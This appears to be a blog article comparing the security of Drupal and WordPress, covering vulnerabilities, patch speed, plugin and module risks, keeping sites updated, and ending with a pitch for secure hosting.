Drupal is widely regarded as a secure content management system, so much so that it is often chosen for sensitive sites, including the sites of many government agencies. WordPress’s reputation for security is not quite as impressive, and we’re all familiar with stories of hacked WordPress sites.
Does that mean it’s fair to say that WordPress is less secure than Drupal?
This is not a simple question to answer because it depends on our answers to other questions: What do we mean by secure? How do we measure security? It certainly wouldn’t be fair to compare media stories about WordPress security with Drupal’s record — there are hundreds of times more WordPress sites than Drupal sites, so you’d expect WordPress to be hacked more.
One possible definition of a secure Content Management System (CMS) is one that is extremely unlikely to be compromised if it is configured according to the documentation and regularly updated. If we accept that definition, then both WordPress and Drupal are secure. No application on the web is ever totally secure, but properly configured and regularly updated Drupal and WordPress sites are unlikely to be compromised.
What Are the Qualities of a Secure CMS?
There are many ways to measure the security of an application, but from the perspective of users, three factors are particularly important.
- Few vulnerabilities. Software bugs that cause exploitable vulnerabilities should not be a regular occurrence. They’ll sometimes happen because software is complex and humans are fallible, but users should not expect to see their sites regularly hacked because of vulnerabilities in the core application.
- Vulnerabilities are quickly fixed. When vulnerabilities are reported to the developers, patches to fix them should be released quickly, and users should be informed of the need to update (or updates should happen automatically).
- Easy to secure. If a content management system is generally used by people without a lot of technical knowledge, then it should be designed to minimize opportunities for users to create security problems. For example, it shouldn’t be easy for people to use a default password instead of a secure password.
It’s easier to compare Drupal and WordPress on some of these measures than others. We can see how many critical vulnerabilities are found and fixed in WordPress and Drupal. We can’t see vulnerabilities that haven’t been discovered or reported — so-called zero-day vulnerabilities — but reported vulnerabilities are a useful proxy for overall risk.
It’s clear that both projects have their share of vulnerabilities, but we can also see that patches are released quickly. Both projects take security seriously and react with haste when vulnerabilities are reported.
Security Beyond the Core
What about WordPress plugins and Drupal modules? The fact is that when a WordPress site is hacked, it’s almost always a plugin to blame. There are 50,000 plugins created by developers of mixed ability who are not equally motivated to secure their code. Drupal too has occasional security issues related to modules, but the Drupal module ecosystem is smaller and more tightly controlled.
There are many high-quality WordPress plugins made by developers who are committed to building secure products, but the depth of the WordPress ecosystem means that the average WordPress plugin is more likely to pose a risk than the average Drupal plugin.
For both content management systems, and WordPress in particular, it pays to be cautious when sourcing and installing modules or plugins. Nulled plugins — pirate premium plugins — are a particular issue in the WordPress world. They are often infected with malware, and once a malware-infected plugin is installed on a site, it’s game over.
Developers Can Only Do So Much
Now we come to the most significant cause of security vulnerabilities for any content management system: its users. As we’ve established, every CMS has vulnerabilities that can be exploited by hackers at some point in its life. Those vulnerabilities are usually quickly fixed, but the fixes are useless if they aren’t installed. WordPress users who fail to update WordPress and its plugins are probably the single biggest cause of compromised sites. Outdated sites are also a big problem in the Drupal world, albeit on a smaller scale.
Whereas WordPress’ attracts non-technical users, the same is not true of Drupal, which is squarely aimed at developers and organizations that have the expertise to maintain a more complex content management system. However, because users are expected to be experts or at least have some technical knowledge, it’s not as easy to be secure as WordPress.
Updating Drupal and its modules can be a bit of a pain compared to WordPress’s automatic minor version updates, but if you know what you’re doing, it’s not prohibitively difficult.
Drupal or WordPress?
The truth is that both Drupal and WordPress are secure if properly installed, configured, and maintained. The opposite is also true; a poorly maintained Drupal or WordPress site is a gift to hackers.
Drupal has fewer issues with plugin vulnerabilities, but if a Drupal site is left without updates for a couple of years, it’ll be hacked as quickly as an unpatched WordPress site. Moreover, because Drupal is more complex and more challenging to update, a non-technical user may struggle to maintain adequate security.
If you don’t need the power and flexibility of Drupal, then a well-maintained WordPress site is the best option — just remember to keep the site and its plugins updated.
If you do need Drupal’s flexibility, then the fact that expert developers choose Drupal for highly sensitive government and corporate sites should reassure you that Drupal can be secured to the highest level.
It’s important to understand that security goes deeper than whichever CMS you choose. Both Drupal and WordPress rely on utility software, a database, a web server, an operating system, and more.
These must all be maintained and updated too, and that’s the job of the hosting provider.
The first step in securing your content management system is with secure hosting.